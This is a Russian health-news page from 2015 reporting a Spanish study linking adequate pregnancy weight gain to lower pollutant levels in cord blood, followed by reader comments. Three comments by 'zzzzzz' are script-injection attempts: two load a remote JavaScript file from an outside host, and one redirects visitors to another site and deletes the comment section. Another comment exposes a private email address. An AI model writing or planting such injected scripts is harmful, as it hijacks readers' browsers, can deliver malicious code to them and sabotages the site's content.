Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Набирайте больше веса во ...  >>  Набирайте больше веса во время беременности! Он защищает детей!
 
Обратная связь
 

Набирайте больше веса во время беременности! Он защищает детей!

Размер шрифта
04 февраля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

По мнению ученых, женщинам полезно набирать вес во время беременности - ведь в таком случае их ребенок будет защищен от влияния вредных веществ, которые содержатся в организме матери.

Набирайте больше веса во время беременности! Он защищает детей!

Те беременные женщины, которые не набирают достаточный вес, теряют собственную жировую ткань в период роста плода. Это приводит к высвобождению различных жирорастворимых веществ, к примеру пестицидов, в кровь матери, а значит эти вещества могут попасть и в организм ребенка.

«Мы считаем, что достаточный набор веса во время беременности может помочь снизить концентрацию вредных веществ, содержащихся в жировой ткани, таким образом уменьшая их влияние на плод», - рассказывает Джонатан Шевьер, эпидемиолог из Университета Монреаля.

Воздействие веществ, относящихся к группе стойких органических загрязнителей, на развивающийся плод может привести к отклонениям в развитии ребенка, а также ухудшению работы иммунной системы и гормональным нарушениям.

В новом исследовании приняли участие 325 беременных женщин из города Авила, Испания. Ученые определили количество килограмм, набранных каждой женщиной за время беременности, а также измерили уровень 35 определенных химических веществ в пуповинной крови. В число этих вредных химикатов вошли бромированные добавки, органохлориновые пестициды, такие как ДДТ и полихлорированные дифенилы. Согласно полученным данным, влияние химикатов на плод снижалось при наборе веса. Были проанализорованы также некоторые другие факторы, которые могли повлиять на концентрацию вредных веществ, такие как возраст матери и ее режим питания. Выяснилось, что они оказывают влияние лишь на концентрацию двух веществ - на продукт обмена инсекцитида линдана под названием бета-HCH и продукт обмена ДДТ - DDE. ДДТ был запрещен в Америке в 1972 году, поскольку накапливался в окружающей среде. Использование линдана в сельском хозяйстве было прекращено в 2006 году из-за его возможного влияния на нервную систему. 

При наборе 450 грамм веса во время беременности было отмечено снижение уровня DDE в пуповинной крови на 0.75% и снижение уровня бета-HCH на 1.4%. В среднем женщина набирает порядка 13 кг за время беременности, что позволяет значительно снизить количество вредных химикатов в крови (DDE на 22% и бета-HCH на 42%). Рекомендованный ВОЗ нормальный набор веса во время беременности составляет в среднем от 11 до 16 кг.

По мнению ученых из Университета Овьедо, Испания, если беременная женщина имеет недостаток жировой ткани, она может терять имеющиеся запасы жира в течение последнего триместра, когда ребенок быстро растет. Такой эффект «мобилизации» жира в ответ на потребности плода может запустить выброс различных органических загрязнителей в кровоток; впоследствии они могут пройти через плаценту и достигнуть организма плода. Эти данные были опубликованы в журнале Environmental Health Perspectives.

Беременность - не время для диет. Следите за своим питанием и набирайте вес правильно - так вы сможете позаботиться о будущем своего малыша.

Другие статьи о детском здоровье читайте на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

04 февраля 2015 в 08:27

Цитировать   |   Пожаловаться

Правильно, "Беременность - не время для диет."

За диетой потом, к всемирно- известному диетологу Мвлышевай.

2 - Гость

04 февраля 2015 в 10:00

Цитировать   |   Пожаловаться

А мне как быть, я до 1й беременности весила 50кг после т.е. сразу после родов 65кг хорошо там весы. ...ели похудела. ...до 2й беременности весила 52кг после родов 78кг (в этот же день)...я в шоке ((( мой рост 164см

Zhu.s@inbox.ru 
Раиса

3 - zzzzzz

30 июня 2015 в 18:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:20

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Каждые 8 минут родители почти убивают своих детей!   Как сделать тест на беременность?   Как подготовиться к беременности   Что можно узнать о жизни ребенка в социальных сетях  
08 февраля 2013Ожирение можно предсказать сразу после рождения 07 декабря 2012Жизнь наследника британской короны под угрозой
 
25 июля 2012Скоро мы сможем восстанавливаться после травм как ящерицы! 24 июля 2012Организм матери считает плод чужеродным элементом!
 

Слайдшоу

1
Растяжки! Можно ли от них избавиться?
Вся правда о месячных и беременности
11 способов узнать, что ты беременна

Тесты

1
Кофеин вызывает зависимость?
Что есть будущим мамам?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.